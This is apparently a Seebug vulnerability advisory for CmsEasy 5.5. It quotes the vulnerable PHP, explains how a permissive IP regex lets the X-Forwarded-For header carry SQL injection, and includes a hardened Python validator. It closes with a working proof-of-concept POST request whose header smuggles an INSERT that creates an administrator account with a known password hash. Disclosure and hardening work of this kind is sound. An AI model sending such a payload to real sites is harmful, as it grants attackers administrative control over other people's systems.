CmsEasy latest version: SQL injection allows registering an administrator

2014-06-04T00:00:00
ID SSV:94017
Type seebug
Reporter Root
Modified 2014-06-04T00:00:00

Description

Brief description:

CmsEasy latest version: SQL injection allows registering an administrator

Details:

The official latest version, CmsEasy_5.5_UTF-8_20140420.rar, contains an SQL injection that is unaffected by GPC; it can be used to obtain the administrator account and to register an administrator. Not sure whether this duplicates 蓝哥's earlier one; posting it first and checking later... File: /lib/default/user_act.php

```php
function respond_action() {
    ini_set("display_errors","On");
    $classname = front::$get['ologin_code'];
    if(front::post('regsubmit')) {
        if(!config::get('reg_on')) {
            front::flash(lang('网站已经关闭注册!'));
            return;
        }
        if(front::post('username') != strip_tags(front::post('username')) ||front::post('username') != htmlspecialchars(front::post('username')) ) {
            front::flash(lang('用户名不规范!'));
            return;
        }
        if(strlen(front::post('username'))<4) {
            front::flash(lang('用户名太短!'));
            return;
        }
        if(front::post('username') &&front::post('password')) {
            $username=front::post('username');
            $password=md5(front::post('password'));
            $data=array(
                'username'=>$username,
                'password'=>$password,
                'groupid'=>101,
                'userip'=>front::ip(), //====== the problem is here ======
                $classname=>session::get('openid'),
            );
            if($this->_user->getrow(array('username'=>$username))) {
                front::flash(lang('该用户名已被注册!'));
                return;
            }
            $insert=$this->_user->rec_insert($data);
            $_userid = $this->_user->insert_id();
            if($insert){
                front::flash(lang('注册成功!'));
            }else {
                front::flash(lang('注册失败!'));
                return;
            }
            $user=$data;
            cookie::set('login_username',$user['username']);
            cookie::set('login_password',front::cookie_encode($user['password']));
            session::set('username',$user['username']);
            front::redirect(url::create('user'));
            exit;
        }
    }

    if (front::post('submit')) {
        if (front::post('username') && front::post('password')) {
            $username = front::post('username');
            $password = md5(front::post('password'));
            $data = array(
                'username' => $username,
                'password' => $password,
            );
            $user = new user();
            $row = $user->getrow(array('username' => $data['username'], 'password' => $data['password']));
            if (!is_array($row)) {
                $this->login_false();
                return;
            }
            $post[$classname] = session::get('openid');
            $this->_user->rec_update($post, 'userid=' . $row['userid']);
            cookie::set('login_username', $row['username']);
            cookie::set('login_password', front::cookie_encode($row['password']));
            session::set('username', $row['username']);
            front::redirect(url::create('user'));
            return;
        } else {
            $this->login_false();
            return;
        }
    }

    include_once ROOT.'/lib/plugins/ologin/'.$classname.'.php';
    $ologinobj = new $classname();
    $status = $ologinobj->respond();
    //var_dump(session::get('openid'));exit;
    $where[$classname] = session::get('openid');
    if(!$where[$classname]) front::redirect(url::create('user'));
    $user = new user();
    $data = $user->getrow($where);
    if(!$data){
        $this->view->data = $status;
    }else{
        cookie::set('login_username',$data['username']);
        cookie::set('login_password',front::cookie_encode($data['password']));
        session::set('username',$data['username']);
        front::redirect(url::create('user'));
    }
}
```

Now let's look at the ip() function, in /lib/tool/front_class.php:

```php
static function ip() {
    if ($_SERVER['HTTP_CLIENT_IP']) {
        $onlineip = $_SERVER['HTTP_CLIENT_IP'];
    } elseif ($_SERVER['HTTP_X_FORWARDED_FOR']) {
        $onlineip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    } elseif ($_SERVER['REMOTE_ADDR']) {
        $onlineip = $_SERVER['REMOTE_ADDR'];
    } else {
        $onlineip = $_SERVER['REMOTE_ADDR'];
    }
    if(config::get('ipcheck_enable')){
        if(!preg_match('/^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$/', $onlineip)&&!preg_match('@^\s*((([0-9A-Fa-f]{1,4}:){7}(([0-9A-Fa-f]{1,4})|:))|(([0-9A-Fa-f]{1,4}:){6}(:|((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})|(:[0-9A-Fa-f]{1,4})))|(([0-9A-Fa-f]{1,4}:){5}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:){4}(:[0-9A-Fa-f]{1,4}){0,1}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:){3}(:[0-9A-Fa-f]{1,4}){0,2}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:){2}(:[0-9A-Fa-f]{1,4}){0,3}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:)(:[0-9A-Fa-f]{1,4}){0,4}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(:(:[0-9A-Fa-f]{1,4}){0,5}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})))(%.+)?\s*$@', $onlineip)){
            exit('来源非法');
        }
    }
    return $onlineip;
}
```

At first glance there is nothing wrong; the IP is filtered. But look at the very end of the second regex: (%.+)?\s* . There is a %, and anything at all may follow it, so a value like 127.0.0.1%xxxxxx also matches the regex, which bypasses the check.... Could this be a backdoor?! The value then reaches $insert=$this->_user->rec_insert($data); and the injection occurs...
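The regex weakness described above, as an added example that is not CmsEasy's code: the dotted-quad branch of the front::ip() IPv6 pattern with its `(%.+)?` tail is reproduced in Python next to a hardened validator and a client-address resolver that honours X-Forwarded-For only behind an operator-controlled proxy (note that in the original the regex runs only when ipcheck_enable is set; with it off nothing is validated). The sample inputs and the proxy address are constructed.

```python
import ipaddress
import re

# Added example (not CmsEasy code). The zone-id tail of the IPv6 regex in
# front::ip() (lib/tool/front_class.php) is "(%.+)?\s*$": after any address
# alternative it accepts "%" followed by anything. Only the dotted-quad branch
# of that regex is reproduced here, the branch a "127.0.0.1%..." value hits.
OCTET = r"(25[0-5]|2[0-4]\d|[01]?\d{1,2})"
CMSEASY_IP_RE = re.compile(r"^\s*(" + OCTET + r"(\." + OCTET + r"){3})(%.+)?\s*$")


def cmseasy_accepts(value: str) -> bool:
    """Mirror of the vulnerable check: True means the value reaches the INSERT."""
    return CMSEASY_IP_RE.match(value) is not None


def is_valid_client_ip(value: str) -> bool:
    """Hardened check: a client address is a bare IPv4/IPv6 literal, nothing more.

    A zone id ("%eth0") only makes sense for link-local addresses on the local
    host, so any "%" is rejected outright instead of being parsed.
    """
    if "%" in value or value != value.strip():
        return False
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return False
    return True


def client_ip(server: dict, trusted_proxies: set) -> str:
    """Resolve the client address without trusting attacker-supplied headers.

    X-Forwarded-For is honoured only when the TCP peer (REMOTE_ADDR) is a
    proxy we operate, and each hop is still validated before being used.
    """
    remote = server.get("REMOTE_ADDR", "")
    if remote not in trusted_proxies:
        return remote
    hops = [h.strip() for h in server.get("HTTP_X_FORWARDED_FOR", "").split(",")]
    # Walk back from the proxy-appended end to the first untrusted hop.
    for hop in reversed([h for h in hops if h]):
        if hop in trusted_proxies:
            continue
        return hop if is_valid_client_ip(hop) else remote
    return remote
```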

Proof of concept:

User records before:

[Screenshot: 1.png]

Send the request:

```
POST /cmseasy1/index.php?case=user&act=respond HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
X-Forwarded-For: 127.0.0.1%'),('xfkxfk','e10adc3949ba59abbe56e057f20f883e','2','127.0.0.1')#

username=666666&password=666666&regsubmit=%2B%E6%B3%A8%E5%86%8C%2B
```

[Screenshot: 2.png]

Administrator xfkxfk was added successfully

[Screenshot: 3.png]